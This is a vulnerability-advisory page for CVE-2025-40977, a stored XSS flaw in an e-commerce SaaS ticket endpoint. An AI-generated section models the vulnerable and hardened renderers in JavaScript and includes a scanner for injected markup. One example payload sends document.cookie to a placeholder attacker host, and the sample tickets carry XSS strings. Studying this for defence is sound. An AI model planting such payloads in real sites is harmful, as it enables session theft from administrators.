VYPR
Medium severity · NVD Advisory · Published Jan 12, 2026 · Updated Apr 15, 2026

CVE-2025-40977

Description

Stored Cross-Site Scripting (XSS) vulnerability in WorkDo's eCommerceGo SaaS, consisting of a lack of proper validation of user input by sending a POST request to ‘/store-ticket’, using the ‘subject’ and ‘description’ parameters.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

A stored XSS vulnerability in WorkDo eCommerceGo SaaS allows an attacker to inject arbitrary JavaScript via the subject and description parameters to /store-ticket.

Vulnerability

Overview

CVE-2025-40977 describes a stored cross-site scripting (XSS) vulnerability in WorkDo's eCommerceGo SaaS application. The root cause is the lack of proper validation of the user-supplied subject and description parameters in a POST request to the /store-ticket endpoint. The submitted values are persisted and later rendered into pages viewed by other users without adequate output encoding (the defining condition of stored XSS), so injected script is stored on the server and executes in the browser of any user who opens the affected ticket [1].
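The following is an added illustration of the flaw pattern described above, placed beside its hardened form. It is not eCommerceGo or WorkDo code: the in-memory store, the storeTicket() handler, the renderer names and the payload are assumptions; only the field names `subject` and `description` come from the CVE description.

```javascript
// Added example: minimal model of the stored-XSS pattern behind this CVE.
// Not eCommerceGo code. The in-memory store, storeTicket(), the renderers
// and the payload are assumptions; only the field names `subject` and
// `description` come from the CVE description.

// Stand-in for the application's database of tickets submitted via POST /store-ticket.
const tickets = [];

// Handler that persists the request body as-is. Storing raw text is not itself
// the bug; the bug is rendering it later without encoding.
function storeTicket(body) {
  const ticket = {
    id: tickets.length + 1,
    subject: String(body.subject ?? ''),
    description: String(body.description ?? ''),
  };
  tickets.push(ticket);
  return ticket;
}

// Vulnerable view: stored fields are concatenated straight into the HTML that
// a support agent or administrator loads when reviewing the ticket.
function renderTicketUnsafe(ticket) {
  return `<div class="ticket"><h2>${ticket.subject}</h2><p>${ticket.description}</p></div>`;
}

// Encoder for the HTML text and double-quoted attribute contexts. Other contexts
// (URLs, inline JavaScript, CSS) need their own encoders, not this one.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Hardened view: every untrusted field is encoded for the context it lands in.
function renderTicketSafe(ticket) {
  return `<div class="ticket"><h2>${escapeHtml(ticket.subject)}</h2><p>${escapeHtml(ticket.description)}</p></div>`;
}

// Constructed payload of the kind a low-privileged user could submit. The
// attacker host is a placeholder.
const PAYLOAD = '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">';

// Submit one malicious ticket and render it both ways.
function demo() {
  const t = storeTicket({ subject: 'Order #1234 not shipped', description: PAYLOAD });
  return { unsafe: renderTicketUnsafe(t), safe: renderTicketSafe(t) };
}

const result = demo();
console.log('vulnerable:', result.unsafe); // onerror handler reaches the victim's browser intact
console.log('hardened:  ', result.safe);   // the same bytes arrive as inert text
```

The encoding has to match the output context: escapeHtml() is correct for element text and quoted attribute values, but a ticket field placed into a URL, an inline script or a style block needs a different encoder, and a template engine with auto-escaping enabled is the safer default. Output encoding is the fix; input validation alone does not stop XSS because legitimate ticket text may contain `<` or quotes.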

Exploitation

Prerequisites

To exploit this vulnerability, an attacker must be able to send a crafted POST request to /store-ticket, i.e. hold an account that is permitted to open a support ticket. The vulnerability carries a CVSS v4.0 base score of 5.1 (Medium); its vector indicates low privileges and required user interaction [1]. In practice that means a low-privileged, authenticated user can plant the payload, and the attack completes only when a victim with higher privileges, such as an administrator or support agent, opens the stored ticket in the application.

Impact

A successful stored XSS attack executes arbitrary JavaScript in the victim's browser under the application's origin and with the victim's session. Typical outcomes are session theft (where the session cookie is not HttpOnly), impersonation of the victim, and unauthorized actions performed in the victim's name, such as changing store settings [1]. With HttpOnly cookies the attacker cannot read the cookie directly but can still drive authenticated requests from the injected page. Note that CVSS v4.0 has no Scope metric (it replaced the v3 Scope metric with separate Vulnerable System and Subsequent System impact metrics), so the impact here is best read as landing on the victim's browser session rather than on the server that stores the ticket.

Mitigation

Status

As of the publication date (January 12, 2026), no official patch or workaround has been announced by WorkDo; the INCIBE advisory notes that no solution had been reported at the time of publication [1]. Users of eCommerceGo SaaS should monitor vendor communications for updates. Until a fix ships, operators can reduce exposure with standard stored-XSS controls: apply contextual output encoding (or a vetted HTML sanitizer) wherever ticket subjects and descriptions are rendered, deploy a restrictive Content-Security-Policy, mark session cookies HttpOnly, and limit which accounts may open tickets. None of these is a vendor-confirmed fix for the underlying issue.
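Because no patch exists yet, a practitioner's first question is whether the ticket table already holds injected markup. The following added triage helper sweeps exported ticket records for HTML and script indicators in the two fields the CVE names. It is not WorkDo code; the record shape, the sample export and the indicator patterns are assumptions, and the sample tickets are constructed for this demo.

```javascript
// Added example: sweep already-stored tickets for injected markup while a
// vendor fix is pending. Not WorkDo code; the record shape, the export and
// the regexes are assumptions. Only `subject` and `description` come from
// the CVE description.

// Indicators that a field meant to be plain text contains HTML or script.
// Order matters only for the order findings are reported in.
const INDICATORS = [
  { name: 'html-tag',       re: /<\/?[a-z][\w-]*[^>]*>/i },   // <svg ...>, <a href=...>, </a>
  { name: 'event-handler',  re: /\bon[a-z]+\s*=/i },          // onload=, onerror=, onclick=
  { name: 'javascript-uri', re: /javascript\s*:/i },          // href="javascript:..."
];

// Fields the CVE names as the injection points.
const FIELDS = ['subject', 'description'];

// Inspect one ticket and return a finding per (field, indicator) hit.
function auditTicket(ticket) {
  const findings = [];
  for (const field of FIELDS) {
    const value = ticket[field];
    if (typeof value !== 'string') continue;
    for (const { name, re } of INDICATORS) {
      const m = value.match(re);
      if (m) {
        findings.push({ id: ticket.id, field, indicator: name, sample: m[0].slice(0, 60) });
      }
    }
  }
  return findings;
}

// Inspect a whole export (e.g. a JSON dump of the tickets table).
function auditTickets(tickets) {
  return tickets.flatMap(auditTicket);
}

// Constructed sample export. Ticket 102 shows a benign '<' that must not be
// flagged; 103 and 104 carry payloads of the kind this CVE allows.
const SAMPLE_TICKETS = [
  { id: 101, subject: 'Refund for order 5521', description: 'Item arrived damaged, photos attached.' },
  { id: 102, subject: 'Coupon code not applied', description: 'Discount was 10% < expected, please check.' },
  { id: 103, subject: '<svg onload=alert(document.domain)>', description: 'test' },
  { id: 104, subject: 'Login issue', description: 'Click <a href="javascript:void(0)">here</a>' },
];

for (const f of auditTickets(SAMPLE_TICKETS)) {
  console.log(`ticket ${f.id} ${f.field}: ${f.indicator} -> ${JSON.stringify(f.sample)}`);
}
```

Flagged tickets should be reviewed rather than auto-deleted: the hit tells the responder which records to neutralise (or which agent sessions to treat as potentially compromised if the ticket was already opened), and the matched sample gives the payload for log correlation. The regexes are a triage heuristic, not a sanitizer; encoded or split payloads can evade them, which is another reason output encoding at render time remains the actual fix.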

AI Insight generated on May 19, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products: 1

Patches: 0 (no patches discovered yet)


References: 1

News mentions: 0 (no linked articles indexed yet)